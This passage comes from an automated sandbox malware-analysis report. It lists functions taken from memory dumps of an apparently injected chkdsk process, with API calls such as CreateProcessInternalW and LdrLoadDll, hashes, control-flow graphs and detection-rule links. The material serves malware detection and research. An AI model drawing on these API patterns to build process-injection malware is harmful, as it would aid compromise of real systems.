                                  • Opcode Fuzzy Hash: b44c1acee337ea0c686e99c1270b2a65a8297b02c87cd28efe42a10116497b9e
                                  • Instruction Fuzzy Hash: 2CE06FB81042800BDB00EF78D8C089B37A4EF82308B10998AF8A987303C230C81ACBB0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 000DA630 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 303 da630-da646 304 da64c-da661 RtlFreeHeap 303->304 305 da647 call daf20 303->305 305->304
                                  APIs
                                  • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,000C3AF8), ref: 000DA65D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.849544062.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_c0000_chkdsk.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FreeHeap
                                  • String ID: .z`
                                  • API String ID: 3298025750-1441809116
                                  • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                  • Instruction ID: 1c5a6473494bb627cd2705a7199ec21133c7db2ae3c6381b5ebd991af2a36198
                                  • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                  • Instruction Fuzzy Hash: ABE01AB12002046BD714DF99DC45EA777ACEF88750F014555B90857242C630E9108AB0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 000C830C Relevance: 3.1, APIs: 2, Instructions: 57threadwindowCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 312 c830c-c835a call dbe20 call dc9c0 call cace0 call d4e40 321 c835c-c836e PostThreadMessageW 312->321 322 c838e-c8392 312->322 323 c838d 321->323 324 c8370-c838b call ca470 PostThreadMessageW 321->324 323->322 324->323
                                  APIs
                                  • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 000C836A
                                  • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 000C838B
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.849544062.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_c0000_chkdsk.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessagePostThread
                                  • String ID:
                                  • API String ID: 1836367815-0
                                  • Opcode ID: 961365c1e64dfb5fa91f7f1b3c265d0f799480bc51a9c080a2ef6ac3d4a35235
                                  • Instruction ID: f8f4ebf41a6176ae3d6892f3457a3994619cc7569558197fe05f2b205443df2c
                                  • Opcode Fuzzy Hash: 961365c1e64dfb5fa91f7f1b3c265d0f799480bc51a9c080a2ef6ac3d4a35235
                                  • Instruction Fuzzy Hash: 8001A231A8032877E721A7949C43FFE776C6B41F51F05411AFF04BA2C2EAA46A0647F6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 000C8310 Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 327 c8310-c831f 328 c8328-c835a call dc9c0 call cace0 call d4e40 327->328 329 c8323 call dbe20 327->329 336 c835c-c836e PostThreadMessageW 328->336 337 c838e-c8392 328->337 329->328 338 c838d 336->338 339 c8370-c838b call ca470 PostThreadMessageW 336->339 338->337 339->338
                                  APIs
                                  • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 000C836A
                                  • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 000C838B
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.849544062.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_c0000_chkdsk.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessagePostThread
                                  • String ID:
                                  • API String ID: 1836367815-0
                                  • Opcode ID: f2c01e1818d052739ee633fa7746fb4f3ba52e36b8bad28e88873d1147d52be0
                                  • Instruction ID: b3a93c5c4a9917670513c2a8e18c0f02d206f5db2d28062789c38ee8da622790
                                  • Opcode Fuzzy Hash: f2c01e1818d052739ee633fa7746fb4f3ba52e36b8bad28e88873d1147d52be0
                                  • Instruction Fuzzy Hash: 1501A231A8032877E721A7949C43FFE776C6B41F51F054119FF04BA2C2EAA46A0647F6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 000D9165 Relevance: 1.6, APIs: 1, Instructions: 115threadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,000CF040,?,?,00000000), ref: 000D91AC
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.849544062.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_c0000_chkdsk.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateThread
                                  • String ID:
                                  • API String ID: 2422867632-0
                                  • Opcode ID: b1636710406d8e5d97e47a6dc296f3b50e83a72bb60230d145072509fb5d1aa6
                                  • Instruction ID: 4504f2530c409f57e058e4a5ad3fb6a977fdc0cb40b4a7624e8ce663dd87964f
                                  • Opcode Fuzzy Hash: b1636710406d8e5d97e47a6dc296f3b50e83a72bb60230d145072509fb5d1aa6
                                  • Instruction Fuzzy Hash: 3341AB72600706ABD368DF74CC85FE7B3A9BF84704F40461AF52AA7281DB70B9108BB4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 000CACE0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 000CAD52
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.849544062.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_c0000_chkdsk.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Load
                                  • String ID:
                                  • API String ID: 2234796835-0
                                  • Opcode ID: 343ab67df369899ddd45e960eb1e1cf1cc0407856a101373337c9296a528243f
                                  • Instruction ID: b7b57f6f0c56207bf5655a6f28997d43d4c9fa61c559dc5210e0758bf2357931
                                  • Opcode Fuzzy Hash: 343ab67df369899ddd45e960eb1e1cf1cc0407856a101373337c9296a528243f
                                  • Instruction Fuzzy Hash: 7C0171B5E4020DABDF10DBE0DC42FDDB3B89B54308F00419AE90997242F630EB04CBA2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 000DA69D Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 000DA6F4
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.849544062.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_c0000_chkdsk.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateInternalProcess
                                  • String ID:
                                  • API String ID: 2186235152-0
                                  • Opcode ID: 4b77f1525b28765462c36f99d34f845a7569516c4df3b0827f5949d92dde93ae
                                  • Instruction ID: 2c0f4235f2b3b47069d7ace7c83b62c579003701924860a3085a8e4f5316ead2
                                  • Opcode Fuzzy Hash: 4b77f1525b28765462c36f99d34f845a7569516c4df3b0827f5949d92dde93ae
                                  • Instruction Fuzzy Hash: 6D01F2B6204149AFCB04CF98DC81EEB77A9AF8C314F158658FA5DD7202C634E851CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 000DA6A0 Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 000DA6F4
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.849544062.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_c0000_chkdsk.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateInternalProcess
                                  • String ID:
                                  • API String ID: 2186235152-0
                                  • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                  • Instruction ID: 12ded99a47d463587204f8a01ccbcc03bcc57d71ded89eb5fe2477f4f2e219ef
                                  • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                  • Instruction Fuzzy Hash: FF01AFB2210208ABCB54DF89DC80EEB77ADAF8C754F158258BA0D97241C630E851CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 000CACD3 Relevance: 1.5, APIs: 1, Instructions: 39libraryloaderCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 000CAD52
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.849544062.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_c0000_chkdsk.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Load
                                  • String ID:
                                  • API String ID: 2234796835-0
                                  • Opcode ID: e90e30740199396d57f7cd7bed67e18ce7eee6ee49a4a5d75ff6d29f11778ce5
                                  • Instruction ID: 78d0969de327f7a62b7284b23ce9e6f7027b1412787a4235c0d4c2282a2adb6e
                                  • Opcode Fuzzy Hash: e90e30740199396d57f7cd7bed67e18ce7eee6ee49a4a5d75ff6d29f11778ce5
                                  • Instruction Fuzzy Hash: FBF0A475E0020DABDF10DBD0D882FDDB3B89B04308F008195ED1D9B641F630DA04CB92
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 000D9170 Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,000CF040,?,?,00000000), ref: 000D91AC
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.849544062.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_c0000_chkdsk.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateThread
                                  • String ID:
                                  • API String ID: 2422867632-0
                                  • Opcode ID: cd9894b84da853ed4e4ffa8c984e8b48326dd570691f743a48a256f5fb526518
                                  • Instruction ID: 88e22c89fa935fccf694ed0fe68e85282f5b55bf415e9c03c5387f482bb39dc0
                                  • Opcode Fuzzy Hash: cd9894b84da853ed4e4ffa8c984e8b48326dd570691f743a48a256f5fb526518
                                  • Instruction Fuzzy Hash: 5FE06D373803043AE2206599AC02FE7B39C9B91B20F140026FA0DEB2C2D595F80142A8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 000DA781 Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                  Download Yara Rule
                                  APIs
                                  • LookupPrivilegeValueW.ADVAPI32(00000000,?,000CF1C2,000CF1C2,?,00000000,?,?), ref: 000DA7C0
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.849544062.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_c0000_chkdsk.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: LookupPrivilegeValue
                                  • String ID:
                                  • API String ID: 3899507212-0
                                  • Opcode ID: 32e4e15a0b1546b6ed6cfc41be5bc789452a4d7225925380914faeb8848f2d95
                                  • Instruction ID: f806b41a8bc44a73204b210df7feb425319f51699341f8c4e11beaac781b4e93
                                  • Opcode Fuzzy Hash: 32e4e15a0b1546b6ed6cfc41be5bc789452a4d7225925380914faeb8848f2d95
                                  • Instruction Fuzzy Hash: 5AF0A9B13002446BEB14EF54CC89FEB3BA8EF8A310F108094FD4C9B242C530A9048BB0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 000DA790 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                  Download Yara Rule
                                  APIs
                                  • LookupPrivilegeValueW.ADVAPI32(00000000,?,000CF1C2,000CF1C2,?,00000000,?,?), ref: 000DA7C0
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.849544062.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_c0000_chkdsk.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: LookupPrivilegeValue
                                  • String ID:
                                  • API String ID: 3899507212-0
                                  • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                  • Instruction ID: 332dd4e50441459a5c10ce514c5a395e5d791108a8eaaf12587d23c39c3c0ad7
                                  • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                  • Instruction Fuzzy Hash: EAE01AB12002086BDB10DF89DC85FE737ADEF89650F018165BA0857242C930E8108BF5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 000CF6B7 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                  Download Yara Rule
                                  APIs
                                  • SetErrorMode.KERNELBASE(00008003,?,000C8D14,?), ref: 000CF6EB
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.849544062.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_c0000_chkdsk.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorMode
                                  • String ID:
                                  • API String ID: 2340568224-0
                                  • Opcode ID: f3ec0066757ec37bb7ec88ea7e7a61a6bb591fb13afd8a3df758eb188ee319d9
                                  • Instruction ID: f8289f20b06f20729938d8a06a35e3a57224adbff28449134dcb697811786aa3
                                  • Opcode Fuzzy Hash: f3ec0066757ec37bb7ec88ea7e7a61a6bb591fb13afd8a3df758eb188ee319d9
                                  • Instruction Fuzzy Hash: 73E0C2396502002BE700EBB8DC02FE927C6AF60740F080124F54CD72D3D924D4018521
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 000CF6C0 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                  Download Yara Rule
                                  APIs
                                  • SetErrorMode.KERNELBASE(00008003,?,000C8D14,?), ref: 000CF6EB
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.849544062.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_c0000_chkdsk.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorMode
                                  • String ID:
                                  • API String ID: 2340568224-0
                                  • Opcode ID: a2d4a72b799ecba535e6209a82b178d001bd83fc2549ccaf7422d872a4b8c7e9
                                  • Instruction ID: 26417fe2b8fe0716a21403320dd44a94a0a1db6131fd23e3614bbafcaa1a65ad
                                  • Opcode Fuzzy Hash: a2d4a72b799ecba535e6209a82b178d001bd83fc2549ccaf7422d872a4b8c7e9
                                  • Instruction Fuzzy Hash: C2D052666903083BEA10BAA8DC03F6A33C9AB44B00F490078FA48AB3C3E964E4008166
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Non-executed Functions

                                  Function 02038788 Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  • Kernel-MUI-Language-Disallowed, xrefs: 02038914
                                  • Kernel-MUI-Language-Allowed, xrefs: 02038827
                                  • Kernel-MUI-Language-SKU, xrefs: 020389FC
                                  • Kernel-MUI-Number-Allowed, xrefs: 020387E6
                                  • WindowsExcludedProcs, xrefs: 020387C1
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.849798315.0000000002000000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FF0000, based on PE: true
                                  • Associated: 0000000A.00000002.849798315.0000000001FF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.00000000020E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.00000000020F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.00000000020F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.00000000020F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.0000000002100000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.0000000002160000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_1ff0000_chkdsk.jbxd
                                  Similarity
                                  • API ID: _wcspbrk
                                  • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                  • API String ID: 402402107-258546922
                                  • Opcode ID: 220af9dffb8b71e02ea1044d4038cb14ad62283b91d6ac558327d92ba2d25c9d
                                  • Instruction ID: d3fa861c5e0989116f3b5c90b61432265d8531d3a5d1d95dbe3b97c12f747737
                                  • Opcode Fuzzy Hash: 220af9dffb8b71e02ea1044d4038cb14ad62283b91d6ac558327d92ba2d25c9d
                                  • Instruction Fuzzy Hash: C6F1D8B2D00309EFDB52EF95C9849EEB7B9FF08304F1484AAE505A7610E7359A45EF50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 020A822C Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 160COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.849798315.0000000002000000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FF0000, based on PE: true
                                  • Associated: 0000000A.00000002.849798315.0000000001FF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.00000000020E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.00000000020F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.00000000020F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.00000000020F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.0000000002100000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.0000000002160000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_1ff0000_chkdsk.jbxd
                                  Similarity
                                  • API ID: _wcsnlen
                                  • String ID: Bias$DaylightBias$DaylightName$DaylightStart$DynamicDaylightTimeDisabled$StandardBias$StandardName$StandardStart$TimeZoneKeyName
                                  • API String ID: 3628947076-1387797911
                                  • Opcode ID: c752ee82e69e79b3cf91da07497f3acfcb6081d5f8477a3e1bc9bd188f2a3dba
                                  • Instruction ID: 39e2360f2ad58e5be6c72fed957c94e5ab5741903f5c0e430ec721952e9aac73
                                  • Opcode Fuzzy Hash: c752ee82e69e79b3cf91da07497f3acfcb6081d5f8477a3e1bc9bd188f2a3dba
                                  • Instruction Fuzzy Hash: ED41A476240309BEF7019AE0CC91FEEBBADEF05748F508512BA05DA190D7B0DB50ABA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 020513CB Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.849798315.0000000002000000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FF0000, based on PE: true
                                  • Associated: 0000000A.00000002.849798315.0000000001FF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.00000000020E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.00000000020F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.00000000020F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.00000000020F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.0000000002100000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.0000000002160000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_1ff0000_chkdsk.jbxd
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                  • API String ID: 48624451-2108815105
                                  • Opcode ID: c06d7c27a27a8f641a57613f46af04256d82f6cf885b58f8ba79e3ad825a4c81
                                  • Instruction ID: 97722e717ae53d560ea444c639343a0f6ac596132ee6a1584e1933865dbe5e22
                                  • Opcode Fuzzy Hash: c06d7c27a27a8f641a57613f46af04256d82f6cf885b58f8ba79e3ad825a4c81
                                  • Instruction Fuzzy Hash: 0F6111B1D00765AACF25CF59C890ABFBBF6EF84300B54C06DE89A47540D734A640EF60
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 020B3B8E Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 187COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.849798315.0000000002000000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FF0000, based on PE: true
                                  • Associated: 0000000A.00000002.849798315.0000000001FF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.00000000020E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.00000000020F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.00000000020F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.00000000020F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.0000000002100000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.0000000002160000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_1ff0000_chkdsk.jbxd
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                  • API String ID: 48624451-2108815105
                                  • Opcode ID: 2236606f810f037509420e961ca9c33eb2cedb7523ab1834fc373f41618d45f8
                                  • Instruction ID: 6a2c382cf85125cda1ed487876d4f29ea119444b70a29ea5baba0f512a7e6fbf
                                  • Opcode Fuzzy Hash: 2236606f810f037509420e961ca9c33eb2cedb7523ab1834fc373f41618d45f8
                                  • Instruction Fuzzy Hash: 0161A4B1900748EADB76DF99C8405FEBBF5EF54211B24C5A9F8A997100E334EA81EB50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02047EFD Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 127COMMON
                                  Download Yara Rule
                                  APIs
                                  • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 02063F12
                                  Strings
                                  • ExecuteOptions, xrefs: 02063F04
                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 0206E2FB
                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 02063F75
                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 02063EC4
                                  • Execute=1, xrefs: 02063F5E
                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 0206E345
                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 02063F4A
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.849798315.0000000002000000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FF0000, based on PE: true
                                  • Associated: 0000000A.00000002.849798315.0000000001FF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.00000000020E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.00000000020F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.00000000020F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.00000000020F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.0000000002100000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.0000000002160000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_1ff0000_chkdsk.jbxd
                                  Similarity
                                  • API ID: BaseDataModuleQuery
                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                  • API String ID: 3901378454-484625025
                                  • Opcode ID: 851debc423b6fc4c1e14590dbde3c9847f005ebe1cba7aaef5bde6aed9561a75
                                  • Instruction ID: fbec9f60c3235ad1c63b8beb6ac3a45ecc0f40cfa0e4cbd0b4e94f342935b9d5
                                  • Opcode Fuzzy Hash: 851debc423b6fc4c1e14590dbde3c9847f005ebe1cba7aaef5bde6aed9561a75
                                  • Instruction Fuzzy Hash: 5141DA7168071C7EEB21DB94DCC9FEBB3FDAF14704F0045A9A905E6090EB709A45AFA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02050B15 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 272COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.849798315.0000000002000000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FF0000, based on PE: true
                                  • Associated: 0000000A.00000002.849798315.0000000001FF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.00000000020E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.00000000020F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.00000000020F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.00000000020F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.0000000002100000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.0000000002160000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_1ff0000_chkdsk.jbxd
                                  Similarity
                                  • API ID: __fassign
                                  • String ID: .$:$:
                                  • API String ID: 3965848254-2308638275
                                  • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                  • Instruction ID: f01f02f70b863c509f7ab78ba7f7ba549171597fba48b5002b4255e202c7c373
                                  • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                  • Instruction Fuzzy Hash: 93A17C71D0032AEADF65CF68C8447AFBBF6AF0A308F24846ADC42A7241D7319645EB55
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02050554 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202COMMON
                                  Download Yara Rule
                                  APIs
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02072206
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.849798315.0000000002000000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FF0000, based on PE: true
                                  • Associated: 0000000A.00000002.849798315.0000000001FF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.00000000020E0000.00000040.00001000.00020000.00000000.sdmpDownload File
